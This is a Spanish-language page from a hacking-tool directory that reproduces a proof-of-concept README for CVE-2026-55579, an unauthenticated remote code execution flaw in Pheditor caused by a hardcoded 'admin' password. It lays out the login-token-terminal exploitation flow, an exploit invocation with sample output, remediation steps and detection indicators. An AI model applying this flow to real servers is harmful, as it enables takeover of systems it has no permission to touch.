Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-55579 — CVE-2026-55579 – RCE no autenticado en Pheditor mediante contraseña predeterminada codificada "admin". Exploit completo en Python con carga de archivos y ejecución en terminal. Sin dependencias. | Kitploit
Herramientas/GitHubGitHub/ch4120n/cve-2026-55579
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de PayloadsLabs y Práctica
GitHubch4120n/cve-2026-55579

CVE-2026-55579

CVE-2026-55579 – RCE no autenticado en Pheditor mediante contraseña predeterminada codificada "admin". Exploit completo en Python con carga de archivos y ejecución en terminal. Sin dependencias.

110hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2026-55579 — Pheditor Contraseña Predeterminada Hardcodeada RCE

CVE CVSS Status Auth

TL;DR: Pheditor (todas las versiones) se distribuye con una contraseña de administrador predeterminada hardcodeada (admin) incrustada en su código fuente. No se fuerza el cambio de contraseña en el primer inicio de sesión, solo una advertencia visual. Cualquier atacante no autenticado puede iniciar sesión como administrador y abusar del panel de terminal integrado (action=terminal) para ejecutar comandos arbitrarios del sistema operativo con los privilegios del servidor web. Combinado con las capacidades de carga de archivos, esto produce Ejecución Remota de Código (RCE) no autenticada.


Tabla de Contenidos

  1. Resumen de la Vulnerabilidad
  2. La Causa Raíz
  3. Flujo de Explotación
  4. Inicio Rápido y Reproducción
  5. Impacto
  6. Remediación
  7. Detección
  8. Créditos y Descargo de Responsabilidad

Resumen de la Vulnerabilidad

AtributoDetalles
Identificador CVECVE-2026-55579
Software AfectadoPheditor (todas las versiones hasta la HEAD actual inclusive)
Versión CorregidaNinguna aún (parche del proveedor no publicado; se requiere solución alternativa)
Clase de VulnerabilidadCWE-798: Uso de Credenciales Hardcodeadas
Puntuación CVSS v3.19.8 (Crítico) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AutenticaciónNinguna – las credenciales predeterminadas son públicamente conocidas
VerificaciónConfirmado contra una instalación nueva de Pheditor

La Causa Raíz

La vulnerabilidad se origina a partir de un hash SHA‑512 hardcodeado de la contraseña admin dentro de pheditor.php (línea 11):

define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');

Este hash corresponde a:

echo -n 'admin' | sha512sum

Por qué esto es un fin del juego:

  1. La contraseña nunca se obliga a cambiarla – la aplicación solo muestra un banner de advertencia (líneas 1956–1958 en pheditor.php).
  2. Con admin/admin, un atacante puede iniciar sesión y obtener acceso completo a:
    • Panel de terminal – ejecuta comandos arbitrarios del sistema (action=terminal)
    • Carga de archivos – sube archivos arbitrarios (action=upload)
    • Editor de archivos – lee y escribe cualquier archivo dentro de los permisos del servidor web (action=open/action=save)

No hay limitación de velocidad, bloqueo, ni factor de autenticación adicional.


Flujo de Explotación

El ataque es extremadamente simple y requiere cero conjeturas:

  1. Autenticarse – enviar una solicitud POST a pheditor.php con pheditor_password=admin. El servidor establece una cookie de sesión.
  2. Extraer token CSRF – obtener la página principal y analizar la variable JavaScript token.
  3. RCE mediante Terminal – enviar una solicitud POST con:
    • action=terminal
    • token=<extraído>
    • command=<comando del SO>
    • dir= (opcional)
  4. Salida – la salida del comando se devuelve dentro de etiquetas HTML <pre> y se puede analizar limpiamente.

Alternativamente, el atacante puede subir una web shell o sobrescribir archivos de la aplicación.


Inicio Rápido y Reproducción

1. Levantar el Laboratorio Vulnerable

Clona el repositorio oficial e inicia un servidor local:

git clone https://github.com/pheditor/pheditor.git /tmp/pheditor
cd /tmp/pheditor
php -S localhost:8080 pheditor.php &

2. Ejecutar el PoC

El exploit Python proporcionado depende solo de la biblioteca estándar de Python (sin dependencias externas). Cuenta con CLI basada en argparse, manejo avanzado de errores, modo verbose y control de tiempo de espera.

python3 exploit.py http://localhost:8080/pheditor.php "id; hostname; whoami"

3. Salida Esperada

[*] Logging in with password: admin
[+] Login successful
[*] Extracting CSRF token...
[+] Token: a1b2c3d4e5f6...
[*] Executing: id; hostname; whoami

==================================================
Command Output:
==================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
www-data
==================================================

Impacto

Una explotación exitosa otorga al atacante:

  • Acceso completo al sistema de archivos (lectura/escritura/eliminación) – compromiso del código de la aplicación, configuración y datos.
  • Ejecución de comandos arbitrarios – permite instalar puertas traseras, pivotar a redes internas o exfiltrar información sensible.
  • Escalada de privilegios – si el servidor web se ejecuta como un usuario privilegiado (a menudo root), el atacante obtiene control total del anfitrión.
  • Pérdida completa de confidencialidad, integridad y disponibilidad – como refleja la puntuación CVSS.

Dado que Pheditor se utiliza a menudo en entornos de desarrollo o como un gestor de archivos ligero, los atacantes pueden encontrarlo y explotarlo fácilmente para obtener puntos de apoyo iniciales.


Remediación

  1. Acción inmediata: Cambiar la contraseña predeterminada inmediatamente después de la instalación. Usar una contraseña fuerte y única.
  2. Deshabilitar la funcionalidad de terminal si no es estrictamente necesaria (eliminar el panel de terminal de la interfaz de usuario o agregar un indicador de configuración para deshabilitarlo).
  3. Aplicar parche del proveedor tan pronto como esté disponible (se ha notificado al mantenedor y se espera una corrección).
  4. Defensa en profundidad:
    • Restringir el acceso a la interfaz de Pheditor mediante listas blancas de IP o VPN.
    • Ejecutar el servidor web con un usuario de mínimo privilegio (no root).
    • Monitorear los registros de acceso en busca de patrones sospechosos (por ejemplo, pheditor_password=admin).

Detección

Monitorea tu entorno en busca de indicadores de compromiso:

  • Registros de acceso: Buscar solicitudes POST a pheditor.php con pheditor_password=admin o action=terminal.
  • Modificaciones de archivos: Archivos nuevos inesperados (por ejemplo, web shells) o cambios en archivos de aplicación existentes.
  • Ejecución de procesos: Comandos inusuales ejecutados por el usuario del servidor web, especialmente aquellos que involucran sh, bash, nc, curl o wget.
  • Conexiones salientes: El servidor web realiza conexiones salientes inesperadas (reverse shells, exfiltración de datos).

Para una exploración más profunda de la cadena de explotación y payloads adicionales, consulta ANALYSIS.md.


Créditos y Descargo de Responsabilidad

  • Propietario del Repositorio: Ch4120N
  • Desarrollo e Investigación del Exploit: Ch4120N
  • Referencia del Aviso: GHSA-p4h7-p9rj-2pq2

Descargo de responsabilidad: Este repositorio contiene una Prueba de Concepto (PoC) destinada estrictamente a fines de pruebas de seguridad defensivas, educativas y autorizadas. No utilices este código contra sistemas que no poseas o para los que no tengas permiso explícito por escrito para probar. Los autores no asumen ninguna responsabilidad por el mal uso.

Descargar herramienta